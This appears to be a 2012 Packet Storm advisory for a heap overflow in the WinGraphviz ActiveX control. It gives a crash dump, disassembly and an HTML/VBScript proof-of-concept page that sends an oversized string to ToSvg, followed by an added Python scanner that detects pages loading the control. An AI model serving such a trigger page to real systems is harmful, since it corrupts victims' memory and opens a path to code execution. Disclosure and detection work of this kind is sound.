
WinGraphviz Heap Overflow

15 Jul 2012 | Reported by coolkaveh | Type: packetstorm | Source: packetstormsecurity.com

WinGraphviz Heap Overflow Exploit on beSTORM ActiveX (WinGraphviz.dll) Remot

Code
```
Exploit Title: beSTORM ActiveX (WinGraphviz.dll) Remote Heap Overflow PoC
Date: July 15, 2012
Author: coolkaveh
[email protected]
Https://twitter.com/coolkaveh
Vendor Homepage: http://www.beyondsecurity.com/
Version: 3.5.6
Tested on: windows 7 SP1
Exploiting the Exploiters
What kind of crappy fuzzer is that ?
==========================================================================
Registers:
--------------------------------------------------------------------------
EIP 01637FFB
EAX 41414141
EBX 01630000 -> 00905A4D -> Asc: MZMZ
ECX 016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EDI 00000000
ESI 00000000
EBP 0013FD24 -> 0013FD34
ESP 0013FD10 -> 0013FD34


Block Disassembly:
--------------------------------------------------------------------------
1637FE9 CMP DWORD PTR [EAX+10],0
1637FED JE SHORT 01638042
1637FEF MOV ECX,[EBP+8]
1637FF2 MOV EDX,[ECX+10]
1637FF5 MOV [EBP-4],EDX
1637FF8 MOV EAX,[EBP-4]
1637FFB CMP DWORD PTR [EAX],0 <--- CRASH
1637FFE JE SHORT 01638042
1638000 MOV ECX,[EBP-4]
1638003 CMP DWORD PTR [ECX+10],0
1638007 JE SHORT 0163801B
1638009 MOV EDX,[EBP-4]
163800C MOV EAX,[EDX+10]
163800F MOV ECX,[EBP-4]
1638012 MOV EDX,[ECX+10]


ArgDump:
----------------------------------------------------------------------------
EBP+8 016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12 016FF838 -> Asc: AAAAAAAAAAAAAAAAAAAA@AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

============================================================================
<html>
Test Exploit page
<object classid='clsid:684811FB-0523-420F-9E8F-A5452C65A19C' id='fuzzer' ></object>
<script language='vbscript'>

arg1=String(2068, "A")

fuzzer.ToSvg arg1

</script>

```
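For detection, a page that loads this control is recognisable by the CLSID in its `<object>` tag. The scanner below is an added example, not part of the original advisory: it flags HTML that instantiates the WinGraphviz CLSID from the PoC and reports whether script calls `ToSvg` on that object. The class and function names and the sample input are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID taken from the PoC above; all names below are illustrative.
WINGRAPHVIZ_CLSID = "684811FB-0523-420F-9E8F-A5452C65A19C"
# Constructed sample: same tag shape as the PoC, with a short harmless argument.
SAMPLE = """<object classid='CLSID:{684811FB-0523-420F-9E8F-A5452C65A19C}' id='g'></object>
<script language='vbscript'>g.ToSvg "x"</script>"""


class ActiveXObjectFinder(HTMLParser):
    """Collects <object> tags that instantiate the WinGraphviz control."""

    def __init__(self):
        super().__init__()
        self.object_ids = []   # id attributes of matching <object> tags
        self.scripts = []      # text of every <script> body
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
        elif tag == "object":
            # classid may be written as clsid:GUID or clsid:{GUID}, in any case
            classid = (attrs.get("classid") or "").lower()
            classid = classid.replace("{", "").replace("}", "").strip()
            if classid == "clsid:" + WINGRAPHVIZ_CLSID.lower():
                self.object_ids.append(attrs.get("id") or "")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def scan_page(html_text):
    """Return (instantiates_control, calls_tosvg) for one HTML document."""
    finder = ActiveXObjectFinder()
    finder.feed(html_text)
    finder.close()
    script = "\n".join(finder.scripts)
    calls = any(
        oid and re.search(r"\b%s\s*\.\s*ToSvg\b" % re.escape(oid), script, re.I)
        for oid in finder.object_ids
    )
    return bool(finder.object_ids), calls
```

`scan_page(SAMPLE)` returns `(True, True)`; the first flag alone is enough to justify review, since the control has no reason to be loaded from an untrusted page.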
